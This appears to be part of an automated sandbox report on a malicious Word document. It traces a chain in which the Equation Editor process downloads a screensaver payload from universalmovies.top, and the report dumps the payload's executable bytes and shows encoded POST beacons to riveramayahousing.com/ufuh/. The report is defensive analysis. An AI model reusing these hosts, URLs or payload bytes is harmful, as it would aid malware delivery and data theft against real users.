                                                                                            Origin: http://www.riveramayahousing.com
                                                                                            Referer: http://www.riveramayahousing.com/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Data Raw: 70 6c 3d 4d 45 41 73 2f 39 4c 63 37 41 64 71 42 6c 46 6c 64 69 4a 70 55 31 41 30 76 42 4f 44 42 78 2f 74 2b 37 74 35 2f 71 47 6c 36 55 45 44 45 52 62 75 4c 72 37 33 6f 6a 4c 38 77 4f 69 48 52 57 42 31 65 4f 36 67 42 4a 79 55 71 7a 76 72 79 65 38 41 30 7a 75 6c 4a 45 6f 43 42 30 68 45 7a 4d 65 57 6f 64 64 68 4e 41 74 4d 67 4f 48 43 45 52 4d 41 2b 70 65 76 54 76 66 44 35 68 58 65 64 77 2f 49 31 5a 37 5a 79 44 57 4e 59 73 78 42 34 31 57 71 6e 46 67 6a 2b 77 66 74 73 78 4a 43 70 50 66 4e 4d 43 65 2b 57 56 72 30 66 6e 72 4d 31 6a 2b 4a 7a 6d 6b 46 50 48 68 44 6d 4f 46 69 42 76 6f 39 6c 77 3d 3d
                                                                                            Data Ascii: pl=MEAs/9Lc7AdqBlFldiJpU1A0vBODBx/t+7t5/qGl6UEDERbuLr73ojL8wOiHRWB1eO6gBJyUqzvrye8A0zulJEoCB0hEzMeWoddhNAtMgOHCERMA+pevTvfD5hXedw/I1Z7ZyDWNYsxB41WqnFgj+wftsxJCpPfNMCe+WVr0fnrM1j+JzmkFPHhDmOFiBvo9lw==


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            36192.168.2.2249200208.91.197.13802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:29:55.788033962 CEST2440OUTPOST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 3623
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.riveramayahousing.com
                                                                                            Origin: http://www.riveramayahousing.com
                                                                                            Referer: http://www.riveramayahousing.com/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Data Raw: 70 6c 3d 4d 45 41 73 2f 39 4c 63 37 41 64 71 42 47 64 6c 4e 78 68 70 46 46 41 33 7a 52 4f 44 4b 52 2f 70 2b 37 68 35 2f 75 65 31 37 6d 6f 44 46 43 6a 75 4c 49 54 33 6c 44 4c 38 6e 65 6a 41 63 32 41 75 65 4b 72 66 42 49 43 45 71 78 6a 72 79 39 45 41 32 32 61 6d 52 45 6f 45 51 6b 68 44 7a 4d 66 4d 6f 64 4e 6c 4e 41 5a 6d 67 4b 72 43 45 44 6b 41 38 5a 65 6f 50 2f 66 44 35 68 58 53 64 77 2f 67 31 5a 6a 2f 79 47 37 49 62 66 70 42 35 55 32 71 68 69 38 6b 70 67 66 68 6c 52 49 4e 74 39 32 6a 42 78 32 2f 54 47 75 51 66 48 62 59 30 67 79 77 39 41 63 79 47 69 6c 4d 72 2b 55 50 42 72 68 79 33 53 70 74 6f 46 75 57 7a 6e 2b 75 2b 4f 6c 66 36 42 6a 79 4f 54 33 35 47 4e 4e 4a 63 35 4c 53 36 46 33 62 64 44 2f 4f 73 47 4f 50 78 2f 52 64 37 38 75 59 33 70 6b 41 57 62 41 59 4b 4a 51 71 64 71 74 58 65 58 70 70 56 6a 6a 38 65 4d 79 4a 2b 48 6c 4e 71 53 35 34 49 2f 42 4a 4b 70 2b 6f 43 72 31 37 71 50 78 64 6d 71 34 43 6c 62 4d 68 70 41 35 73 38 47 59 49 77 76 51 76 4f 31 39 64 34 43 4f 69 6c 38 66 72 71 44 32 77 43 6f 76 [TRUNCATED]
                                                                                            Data Ascii: pl=MEAs/9Lc7AdqBGdlNxhpFFA3zRODKR/p+7h5/ue17moDFCjuLIT3lDL8nejAc2AueKrfBICEqxjry9EA22amREoEQkhDzMfModNlNAZmgKrCEDkA8ZeoP/fD5hXSdw/g1Zj/yG7IbfpB5U2qhi8kpgfhlRINt92jBx2/TGuQfHbY0gyw9AcyGilMr+UPBrhy3SptoFuWzn+u+Olf6BjyOT35GNNJc5LS6F3bdD/OsGOPx/Rd78uY3pkAWbAYKJQqdqtXeXppVjj8eMyJ+HlNqS54I/BJKp+oCr17qPxdmq4ClbMhpA5s8GYIwvQvO19d4COil8frqD2wCovzEKWs4j0kUvi6EWCONAg5w/Q5txW3ndT/GFRxqcwiljAq53W1ReyfaBJ3IJLyxVkzDaKfkpyNQtQ4QuLW1p0sX5iPoI/gYwYvCuN3XH6hIeOcoRHCe7vZE508Cf46TadOFmwZ3kgolPHA15FBVuvqlRjMSnYmFiYVtSxoCp4Fggkfro6jn2hAk01/+lMIqt58bYnAvGewRRsL65UTy/bTa+UyGwB5TvGWKOucMzlY9wlkl/blGl2QDt96SnQSy2AtgaHgUdAITHEbKQcFsTOKiSgNNEF8tvfRv28SE06WEdRw8205PTleTYWkbfvod8rlc78QPQPm/3WTYOG+BLsVC0IL0VQWPm5nbam55uCXWE9GUA61jIFEGR5TTeezqoQbjg4ppbSujThoDxCJuoWQl/cnOaBADtGDUc0p1sQOOPiIrKNtbn5pRcMlWDcjRtcxQc4czJh/NtxMCcLGDsoyLG076hMSXZpsp8iZPrP52A6ryRD+WRAHifHah6asvA3BYCcxhK4flYhta0V5ovRacAFKF1wbCXP5/h6dZyCaziAouG5Ax23cUcYbsjOysWzXg+bUo4ncS4ecsfHXJ7c/Q0W5IA/FTjcOS4rgdEwsf47wcGtu8tWbNKiXTzCLYbiXn7bmv3gxpQhILqnksOlwqE+Cn1j2evNn7 [TRUNCATED]


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            37192.168.2.2249201208.91.197.13802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:29:58.393846989 CEST474OUTGET /ufuh/?pl=BGoM8L/qyzApLAJaWwxXSF4Q93O5MlPc94ZXocaCy2sUMxOmUp3yiivF6ezDdXcwaqjwM/LWkQHX7JcCzmOdeG0afWN38JyHw8R/BztNg4nUSBFA8ZqxTffzx161&5h1t=6H6PKFvXjtI4u8k HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Connection: close
                                                                                            Host: www.riveramayahousing.com
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            May 2, 2024 08:29:58.718971968 CEST538INHTTP/1.1 200 OK
                                                                                            Date: Thu, 02 May 2024 06:29:57 GMT
                                                                                            Server: Apache
                                                                                            Set-Cookie: vsid=928vr46217699796753390; expires=Tue, 01-May-2029 06:29:57 GMT; Max-Age=157680000; path=/; domain=www.riveramayahousing.com; HttpOnly
                                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_BUVgkU9SpCnHQ8oULqnTgicRnkkNtgpShIapMsQeWrY282jo0jLgfAIGTYA6YB3wLI68m1kQIaVlKspL7KBAlg==
                                                                                            Content-Length: 3246
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Connection: close
                                                                                            May 2, 2024 08:29:58.719037056 CEST645INData Raw: 3c 21 2d 2d 0d 0a 09 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 72 69 76 65 72 61 6d 61 79 61 68 6f 75 73 69 6e 67 2e 63 6f 6d 2f 3f 66 70 3d 75 65 43 46 44 68 61 65 63 64 76 59 56 78 38 68 62 4b 68 30 36 31 34 49
                                                                                            Data Ascii: ...top.location="http://www.riveramayahousing.com/?fp=ueCFDhaecdvYVx8hbKh0614IfmGTEHuPdqyahOjyxp6XOetDiexINCTsAPUMAD2K5PJhvyiF97Uyk%2FtYol%2F9zVR8uouxLzIrQwOFwrupWRXB%2BaC%2BfpKrnEtvHWvoKhF33RK4ZbJcCpVOhC6NB9sgsvHvypyCZar4ahtRXkYYRhV%2FeE%
                                                                                            May 2, 2024 08:29:58.719116926 CEST1220INData Raw: 4d 69 77 56 6b 25 32 42 45 78 74 56 6b 43 6c 33 6b 66 70 26 63 69 66 72 3d 31 26 70 6c 3d 42 47 6f 4d 38 4c 25 32 46 71 79 7a 41 70 4c 41 4a 61 57 77 78 58 53 46 34 51 39 33 4f 35 4d 6c 50 63 39 34 5a 58 6f 63 61 43 79 32 73 55 4d 78 4f 6d 55 70
                                                                                            Data Ascii: MiwVk%2BExtVkCl3kfp&cifr=1&pl=BGoM8L%2FqyzApLAJaWwxXSF4Q93O5MlPc94ZXocaCy2sUMxOmUp3yiivF6ezDdXcwaqjwM%2FLWkQHX7JcCzmOdeG0afWN38JyHw8R%2FBztNg4nUSBFA8ZqxTffzx161&5h1t=6H6PKFvXjtI4u8k";/*--><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADS
                                                                                            May 2, 2024 08:29:58.719260931 CEST1220INData Raw: 25 32 46 71 37 66 39 76 45 62 6b 52 35 6c 46 4b 50 49 33 52 54 50 73 4f 38 72 6e 37 7a 75 6d 57 67 48 6b 63 53 44 67 6d 32 25 32 42 37 57 76 73 7a 46 73 51 4d 6f 57 7a 43 73 7a 62 36 4b 7a 6e 6a 66 73 6b 47 36 25 32 46 6f 59 56 45 52 74 53 64 32
                                                                                            Data Ascii: %2Fq7f9vEbkR5lFKPI3RTPsO8rn7zumWgHkcSDgm2%2B7WvszFsQMoWzCszb6KznjfskG6%2FoYVERtSd2plNZv3lMQNzl3zNXKwadcLcxwgGoFfYfJDcixEYw7R6RS%2Fj8pJQFuik%2FJtlnVml2xuZziPUZZB2QoYgWm5Us0BqWj8IBFfReEaI8dCpOgdYE04NRDR0diAAoehR5M%2BvKu7VLJOjQMPGyOB%2FyaMiwVk%2B
                                                                                            May 2, 2024 08:29:58.719274044 CEST161INData Raw: 44 64 58 63 77 61 71 6a 77 4d 25 32 46 4c 57 6b 51 48 58 37 4a 63 43 7a 6d 4f 64 65 47 30 61 66 57 4e 33 38 4a 79 48 77 38 52 25 32 46 42 7a 74 4e 67 34 6e 55 53 42 46 41 38 5a 71 78 54 66 66 7a 78 31 36 31 26 35 68 31 74 3d 36 48 36 50 4b 46 76
                                                                                            Data Ascii: DdXcwaqjwM%2FLWkQHX7JcCzmOdeG0afWN38JyHw8R%2FBztNg4nUSBFA8ZqxTffzx161&5h1t=6H6PKFvXjtI4u8k">Click here to proceed</a>.</body></noframes></html>...*/-->


                                                                                            HTTPS Proxied Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.2249163104.21.74.1914431808C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-05-02 06:26:08 UTC313OUTGET /opp.scr HTTP/1.1
                                                                                            Accept: */*
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            Host: universalmovies.top
                                                                                            Connection: Keep-Alive
                                                                                            2024-05-02 06:26:08 UTC775INHTTP/1.1 200 OK
                                                                                            Date: Thu, 02 May 2024 06:26:08 GMT
                                                                                            Content-Type: application/x-silverlight
                                                                                            Content-Length: 636928
                                                                                            Connection: close
                                                                                            Last-Modified: Thu, 02 May 2024 01:44:58 GMT
                                                                                            ETag: "9b800-6176ec02e1567"
                                                                                            Accept-Ranges: bytes
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wIecbPPYO9RapwSjTb5jsmCFDJVN2%2FMRjyYMJxT%2FX%2FJMvdu4GdEyuna2Q5cM%2B%2FxqX9OzXV5SNXeMME5kPpHKcEi5KCEOYJVgnDY1g45EIdiVB2kTO0s5G7K9%2BBRtEw33DrWZ2Elf"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 87d5f023cde61871-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            2024-05-02 06:26:08 UTC594INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2f a3 00 ca 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 ac 09 00 00 0a 00 00 00 00 00 00 0e cb 09 00 00 20 00 00 00 e0 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL/0 @ @
                                                                                            2024-05-02 06:26:08 UTC1369INData Raw: ff 6f 00 80 00 00 02 80 00 00 00 00 00 00 05 80 00 00 04 00 00 00 06 00 00 00 05 00 00 00 01 80 00 00 08 00 00 00 09 00 00 00 14 00 00 00 15 00 00 00 26 02 28 39 00 00 0a 00 00 2a 22 00 02 80 02 00 00 04 2a 4a 00 7e 06 00 00 04 74 65 00 00 01 28 3e 00 00 0a 26 2a 1e 02 7b 04 00 00 04 2a 22 02 03 7d 04 00 00 04 2a 1e 02 7b 05 00 00 04 2a 22 02 03 7d 05 00 00 04 2a 1e 02 7b 07 00 00 04 2a 22 02 03 7d 07 00 00 04 2a 1e 02 7b 08 00 00 04 2a 22 02 03 7d 08 00 00 04 2a 1e 02 7b 09 00 00 04 2a 22 02 03 7d 09 00 00 04 2a 1e 02 7b 0a 00 00 04 2a 22 02 03 7d 0a 00 00 04 2a 1e 02 7b 0b 00 00 04 2a 22 02 03 7d 0b 00 00 04 2a 22 02 28 39 00 00 0a 00 2a b2 28 05 00 00 06 80 03 00 00 04 28 3f 00 00 0a 7e 03 00 00 04 28 1b 00 00 06 6f 40 00 00 0a 6f 41 00 00 0a 1f 23 9a
                                                                                            Data Ascii: o&(9*"*J~te(>&*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*"(9*((?~(o@oA#
                                                                                            2024-05-02 06:26:08 UTC1369INData Raw: 02 72 b7 04 00 70 28 54 01 00 06 2a 66 03 75 8d 00 00 01 2d 0f 03 75 8e 00 00 01 2d 07 03 28 63 01 00 06 2a 16 2a 66 02 03 28 81 01 00 06 02 6f 91 02 00 06 03 6f 91 02 00 06 28 58 01 00 06 2a 2e 02 2d 07 03 73 bc 00 00 0a 7a 2a 42 02 2d 0c 03 28 f2 03 00 06 73 ad 00 00 0a 7a 2a 2e 02 2d 07 03 73 bd 00 00 0a 7a 2a 52 02 2d 10 72 09 08 00 70 28 f2 03 00 06 73 be 00 00 0a 7a 2a 66 02 6f 8f 00 00 0a 2c 10 72 35 08 00 70 28 f2 03 00 06 73 be 00 00 0a 7a 2a 92 02 75 8e 00 00 01 2d 1a 02 75 92 00 00 01 2d 12 02 75 8d 00 00 01 2d 0a 02 75 93 00 00 01 14 fe 03 2a 17 2a 42 02 72 79 08 00 70 1b 6f ab 00 00 0a 15 fe 02 2a 76 02 2d 0b 72 93 08 00 70 73 bc 00 00 0a 7a 03 2d 0b 72 9b 08 00 70 73 bc 00 00 0a 7a 2a 62 02 2c 08 02 20 b4 05 00 00 33 06 73 c8 00 00 0a 7a 02
                                                                                            Data Ascii: rp(T*fu-u-(c**f(oo(X*.-sz*B-(sz*.-sz*R-rp(sz*fo,r5p(sz*u-u-u-u**Brypo*v-rpsz-rpsz*b, 3sz
                                                                                            2024-05-02 06:26:08 UTC1369INData Raw: 2c 01 2a 04 7e 45 00 00 0a 28 46 00 00 0a 2c 01 2a 02 04 05 0e 04 28 25 02 00 06 2a 7e 02 19 8d 72 00 00 01 25 d0 26 03 00 04 28 ec 00 00 0a 28 11 02 00 06 02 03 28 15 02 00 06 2a 2e 72 7b 09 00 70 80 b7 01 00 04 2a 4e 02 03 7d ba 01 00 04 02 7e b8 01 00 04 7d b9 01 00 04 2a 5a 03 28 2c 00 00 06 28 46 00 00 06 2d 01 2a 02 03 28 31 02 00 06 2a 3e 16 16 16 16 73 33 00 00 06 80 b8 01 00 04 2a ea 02 28 68 00 00 0a 02 03 7d bb 01 00 04 02 04 7d bc 01 00 04 05 2c 13 02 05 6f e3 00 00 0a 74 09 00 00 1b 7d bd 01 00 04 2b 07 02 14 7d bd 01 00 04 02 0e 04 7d be 01 00 04 2a 1e 02 7b bb 01 00 04 2a 1e 02 7b bd 01 00 04 2a 1e 02 7b bc 01 00 04 2a 1e 02 7b be 01 00 04 2a 1e 02 7b bf 01 00 04 2a 1e 02 7b c2 01 00 04 2a 1e 02 7b c0 01 00 04 2a 1e 02 7b c3 01 00 04 2a 1e
                                                                                            Data Ascii: ,*~E(F,*(%*~r%&(((*.r{p*N}~}*Z(,(F-*(1*>s3*(h}},ot}+}}*{*{*{*{*{*{*{*{*
                                                                                            2024-05-02 06:26:08 UTC1369INData Raw: 01 00 04 02 7b 2c 02 00 04 6f ae 02 00 06 74 7d 00 00 01 2a 72 02 7b 2b 02 00 04 7e f8 01 00 04 02 7b 2c 02 00 04 6f ae 02 00 06 74 7d 00 00 01 2a 72 02 7b 2b 02 00 04 7e f9 01 00 04 02 7b 2c 02 00 04 6f ae 02 00 06 a5 9a 00 00 01 2a 72 02 7b 2b 02 00 04 7e fa 01 00 04 02 7b 2c 02 00 04 6f ae 02 00 06 a5 9a 00 00 01 2a 72 02 7b 2b 02 00 04 7e fb 01 00 04 02 7b 2c 02 00 04 6f ae 02 00 06 a5 9a 00 00 01 2a 72 02 7b 2b 02 00 04 7e fc 01 00 04 02 7b 2c 02 00 04 6f ae 02 00 06 a5 18 00 00 01 2a 72 02 7b 2b 02 00 04 7e 00 02 00 04 02 7b 2c 02 00 04 6f ae 02 00 06 74 7d 00 00 01 2a 72 02 7b 2b 02 00 04 7e ed 01 00 04 02 7b 2c 02 00 04 6f ae 02 00 06 a5 9a 00 00 01 2a 72 02 7b 2b 02 00 04 7e ef 01 00 04 02 7b 2c 02 00 04 6f ae 02 00 06 a5 9a 00 00 01 2a 72 02 7b
                                                                                            Data Ascii: {,ot}*r{+~{,ot}*r{+~{,o*r{+~{,o*r{+~{,o*r{+~{,o*r{+~{,ot}*r{+~{,o*r{+~{,o*r{
                                                                                            2024-05-02 06:26:08 UTC1369INData Raw: 51 02 00 04 28 61 01 00 06 02 7b 2e 02 00 04 17 73 16 03 00 06 2a 62 02 7b 50 02 00 04 28 62 01 00 06 02 7b 2e 02 00 04 16 73 16 03 00 06 2a 26 02 03 04 73 0f 03 00 06 2a 56 7e 51 01 00 0a 80 4e 02 00 04 7e 52 01 00 0a 80 4f 02 00 04 2a 3e 02 03 7d 52 02 00 04 02 04 7d 53 02 00 04 2a 72 02 7b 52 02 00 04 7e 4f 02 00 04 02 7b 53 02 00 04 6f ae 02 00 06 a5 41 00 00 01 2a 5e 02 03 04 28 dc 02 00 06 02 04 7d 5a 02 00 04 02 05 7d 5b 02 00 04 2a 62 02 7b 5b 02 00 04 28 61 01 00 06 02 7b 2e 02 00 04 17 73 1d 03 00 06 2a 62 02 7b 5a 02 00 04 28 62 01 00 06 02 7b 2e 02 00 04 16 73 1d 03 00 06 2a 26 02 03 04 73 18 03 00 06 2a f6 7e 53 01 00 0a 80 54 02 00 04 7e 54 01 00 0a 80 55 02 00 04 7e 55 01 00 0a 80 56 02 00 04 7e 56 01 00 0a 80 57 02 00 04 7e 57 01 00 0a 80
                                                                                            Data Ascii: Q(a{.s*b{P(b{.s*&s*V~QN~RO*>}R}S*r{R~O{SoA*^(}Z}[*b{[(a{.s*b{Z(b{.s*&s*~ST~TU~UV~VW~W
                                                                                            2024-05-02 06:26:08 UTC1369INData Raw: 02 00 04 02 7b 8e 02 00 04 6f ae 02 00 06 a5 a2 00 00 01 2a 72 02 7b 8d 02 00 04 7e 86 02 00 04 02 7b 8e 02 00 04 6f ae 02 00 06 a5 a2 00 00 01 2a 72 02 7b 8d 02 00 04 7e 88 02 00 04 02 7b 8e 02 00 04 6f ae 02 00 06 a5 a2 00 00 01 2a 72 02 7b 8d 02 00 04 7e 89 02 00 04 02 7b 8e 02 00 04 6f ae 02 00 06 a5 9a 00 00 01 2a 72 02 7b 8d 02 00 04 7e 8a 02 00 04 02 7b 8e 02 00 04 6f ae 02 00 06 a5 9a 00 00 01 2a 42 02 03 04 28 dc 02 00 06 02 04 7d 90 02 00 04 2a 32 02 7b 90 02 00 04 28 9d 00 00 06 2a 22 02 03 73 61 03 00 06 2a 2e 7e 76 01 00 0a 80 8f 02 00 04 2a 5e 02 03 04 28 dc 02 00 06 02 04 7d 96 02 00 04 02 05 7d 97 02 00 04 2a 62 02 7b 97 02 00 04 28 61 01 00 06 02 7b 2e 02 00 04 17 73 6a 03 00 06 2a 62 02 7b 96 02 00 04 28 62 01 00 06 02 7b 2e 02 00 04 16
                                                                                            Data Ascii: {o*r{~{o*r{~{o*r{~{o*r{~{o*B(}*2{(*"sa*.~v*^(}}*b{(a{.sj*b{(b{.
                                                                                            2024-05-02 06:26:08 UTC1369INData Raw: 00 04 28 59 01 00 06 2a 5e 02 03 04 28 dc 02 00 06 02 04 7d d9 02 00 04 02 05 7d da 02 00 04 2a 3a 02 7b d9 02 00 04 03 04 28 a4 00 00 06 2a 3a 02 7b d9 02 00 04 03 04 28 a5 00 00 06 2a 36 02 7b d9 02 00 04 03 28 a6 00 00 06 2a 62 02 7b da 02 00 04 28 61 01 00 06 02 7b 2e 02 00 04 17 73 a3 03 00 06 2a 62 02 7b d9 02 00 04 28 62 01 00 06 02 7b 2e 02 00 04 16 73 a3 03 00 06 2a 26 02 03 04 73 9b 03 00 06 2a a6 7e ac 01 00 0a 80 d5 02 00 04 7e ad 01 00 0a 80 d6 02 00 04 7e ae 01 00 0a 80 d7 02 00 04 7e af 01 00 0a 80 d8 02 00 04 2a 3e 02 03 7d db 02 00 04 02 04 7d dc 02 00 04 2a 72 02 7b db 02 00 04 7e d6 02 00 04 02 7b dc 02 00 04 6f ae 02 00 06 a5 9a 00 00 01 2a 72 02 7b db 02 00 04 7e d7 02 00 04 02 7b dc 02 00 04 6f ae 02 00 06 a5 9a 00 00 01 2a 72 02 7b
                                                                                            Data Ascii: (Y*^(}}*:{(*:{(*6{(*b{(a{.s*b{(b{.s*&s*~~~~*>}}*r{~{o*r{~{o*r{
                                                                                            2024-05-02 06:26:08 UTC1369INData Raw: f4 02 00 04 02 7b fa 02 00 04 6f ae 02 00 06 a5 9a 00 00 01 2a 32 02 7b 6f 00 00 0a 28 8e 00 00 06 2a 56 02 28 68 00 00 0a 02 03 7d fb 02 00 04 02 04 7d fc 02 00 04 2a 4a 02 6f 8f 00 00 0a 2c 02 14 2a 02 03 73 d9 03 00 06 2a 7a 02 03 72 9d 0f 00 70 28 f0 03 00 06 02 7b fb 02 00 04 03 7b fb 02 00 04 28 b2 00 00 06 2a e2 02 03 72 a9 0f 00 70 28 ef 03 00 06 02 04 72 bb 0f 00 70 28 f0 03 00 06 02 05 72 d3 0f 00 70 28 ef 03 00 06 02 7b fb 02 00 04 03 04 7b fb 02 00 04 05 28 b3 00 00 06 2a 66 02 03 72 f1 0f 00 70 28 f1 03 00 06 02 7b fb 02 00 04 03 28 b4 00 00 06 2a 32 02 7b fb 02 00 04 28 b8 00 00 06 2a 46 02 7b fb 02 00 04 28 b9 00 00 06 28 8c 02 00 06 2a 7a 03 15 fe 04 16 fe 01 72 ad 10 00 70 28 60 01 00 06 02 7b fb 02 00 04 03 28 ba 00 00 06 2a 6a 02 03 72
                                                                                            Data Ascii: {o*2{o(*V(h}}*Jo,*s*zrp({{(*rp(rp(rp({{(*frp({(*2{(*F{((*zrp(`{(*jr
                                                                                            2024-05-02 06:26:08 UTC1369INData Raw: 02 00 0f 00 00 00 0b 00 00 11 02 12 00 28 c9 00 00 06 28 c6 00 00 06 06 2a 00 13 30 06 00 42 00 00 00 09 00 00 11 05 05 7b 09 01 00 04 7b e6 01 00 04 6f 4d 00 00 0a 73 1c 01 00 06 0c 02 03 04 7b e6 01 00 04 08 12 01 12 00 28 cb 00 00 06 28 c6 00 00 06 05 7b 09 01 00 04 28 4e 00 00 0a 07 06 05 73 18 01 00 06 2a 00 00 13 30 06 00 0c 01 00 00 0c 00 00 11 05 05 7b 09 01 00 04 7b e6 01 00 04 6f 4d 00 00 0a 73 1c 01 00 06 0d 0f 01 04 7b e6 01 00 04 6f 4d 00 00 0a 7d 1e 01 00 04 02 0f 01 09 12 00 12 01 12 02 28 cc 00 00 06 28 c6 00 00 06 05 7b 09 01 00 04 28 4e 00 00 0a 04 28 4e 00 00 0a 06 2d 07 16 8d 23 00 00 02 2a 08 8e 69 8d 23 00 00 02 13 04 06 17 6f 4f 00 00 0a 13 05 16 13 06 38 8c 00 00 00 07 11 06 94 13 07 11 06 08 8e 69 17 59 32 09 06 16 6f 4f 00 00 0a
                                                                                            Data Ascii: ((*0B{{oMs{(({(Ns*0{{oMs{oM}(({(N(N-#*i#oO8iY2oO


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:08:26:02
                                                                                            Start date:02/05/2024
                                                                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                            Imagebase:0x13ff80000
                                                                                            File size:1'423'704 bytes
                                                                                            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:2
                                                                                            Start time:08:26:03
                                                                                            Start date:02/05/2024
                                                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                            Imagebase:0x400000
                                                                                            File size:543'304 bytes
                                                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:5
                                                                                            Start time:08:26:08
                                                                                            Start date:02/05/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\op55336.scr
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\op55336.scr"
                                                                                            Imagebase:0xdd0000
                                                                                            File size:636'928 bytes
                                                                                            MD5 hash:3CCB984FD28AFEA83F2F2E8A6ED4CCFA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000005.00000002.351612822.0000000000D40000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:6
                                                                                            Start time:08:26:09
                                                                                            Start date:02/05/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\op55336.scr
